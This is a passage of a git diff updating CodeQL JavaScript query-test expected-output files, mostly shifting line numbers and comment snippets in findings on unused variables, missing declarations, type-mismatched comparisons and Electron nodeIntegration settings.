a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected 
@@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... 
K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected 
@@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected index 1e5f4d643241..a5b1e0c00dfc 100644 
--- a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected +++ b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected @@ -1,3 +1,3 @@ -| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... K\\n } | bar | -| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... K\\n } | bar | -| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... K\\n } | test | +| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... t\\n } | bar | +| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... t\\n } | bar | +| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... t\\n } | test | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected 
+++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 73be1f62b893..a188fe34545d 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected 
@@ -3,7 +3,7 @@ | decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | -| externs.js:6:5:6:13 | iAmUnused | Unused variable iAmUnused. | +| externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | | importWithoutPragma.jsx:1:1:1:27 | import ... react'; | Unused import h. | | interTypes.ts:1:1:1:37 | import ... where"; | Unused import Bar. | | multi-imports.js:1:1:1:29 | import ... om 'x'; | Unused imports a, b, d. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..e94b40e1c1df 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // $ ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 
--- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..1f4a398b2af4 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected 
@@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | | uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..12142d56507f 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected 
@@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. 
| tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. 
| tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. 
| tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. 
| tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. 
| tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:79:31:79:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:79:38:79:41 | null | an expression | +| tst.js:82:35:82:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:82:42:82:45 | null | an expression | +| tst.js:92:5:92:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:92:12:92:15 | null | an expression | +| tst.js:95:9:95:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:95:16:95:19 | null | an expression | +| tst.js:101:5:101:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:101:9:101:13 | "def" | an expression | +| tst.js:108:5:108:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:108:9:108:13 | "def" | an expression | +| tst.js:122:5:122:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:122:13:122:14 | 42 | an expression | +| tst.js:125:5:125:8 | true | This expression is of type boolean, but it is compared to $@ of type string. 
| tst.js:125:13:125:17 | "bar" | an expression | +| tst.js:133:5:133:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:133:11:133:14 | "42" | an expression | +| tst.js:134:5:134:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:134:12:134:12 | b | variable 'b' | +| tst.js:135:5:135:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:135:11:135:11 | b | variable 'b' | +| tst.js:139:5:139:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:139:15:139:23 | undefined | 'undefined' | +| tst.js:140:5:140:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:140:19:140:23 | "foo" | an expression | +| tst.js:142:5:142:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:142:13:142:17 | "foo" | an expression | +| tst.js:144:5:144:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:144:18:144:22 | "foo" | an expression | +| tst.js:151:5:151:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:151:12:151:15 | null | an expression | +| tst.js:152:5:152:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:152:14:152:15 | t1 | variable 't1' | +| tst.js:155:5:155:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:155:12:155:15 | null | an expression | +| tst.js:156:5:156:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:156:14:156:15 | t2 | variable 't2' | +| tst.js:159:5:159:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. 
| tst.js:159:12:159:15 | null | an expression | +| tst.js:160:5:160:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:160:14:160:15 | t3 | variable 't3' | +| tst.js:163:5:163:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:163:12:163:15 | null | an expression | +| tst.js:164:5:164:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:164:14:164:15 | t4 | variable 't4' | +| tst.js:167:5:167:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:167:12:167:15 | null | an expression | +| tst.js:168:5:168:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:168:14:168:15 | t5 | variable 't5' | +| tst.js:171:5:171:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:171:12:171:15 | null | an expression | +| tst.js:172:5:172:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:172:14:172:15 | t6 | variable 't6' | +| tst.js:175:5:175:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:175:12:175:15 | null | an expression | +| tst.js:176:5:176:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:176:14:176:15 | t7 | variable 't7' | +| tst.js:179:5:179:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:179:12:179:15 | null | an expression | +| tst.js:180:5:180:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. 
| tst.js:180:14:180:15 | t8 | variable 't8' | +| tst.js:193:5:193:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:193:12:193:13 | t4 | variable 't4' | +| tst.js:194:5:194:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:194:12:194:13 | t2 | variable 't2' | +| tst.js:195:5:195:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:195:12:195:13 | t4 | variable 't4' | +| tst.js:196:5:196:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:196:12:196:13 | t3 | variable 't3' | +| tst.js:198:5:198:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:198:12:198:13 | t5 | variable 't5' | +| tst.js:199:5:199:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:199:12:199:13 | t2 | variable 't2' | +| tst.js:200:5:200:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:200:12:200:13 | t5 | variable 't5' | +| tst.js:201:5:201:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:201:12:201:13 | t3 | variable 't3' | +| tst.js:216:13:216:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:216:20:216:24 | "foo" | an expression | +| tst.js:224:5:224:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. 
| tst.js:224:11:224:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected 
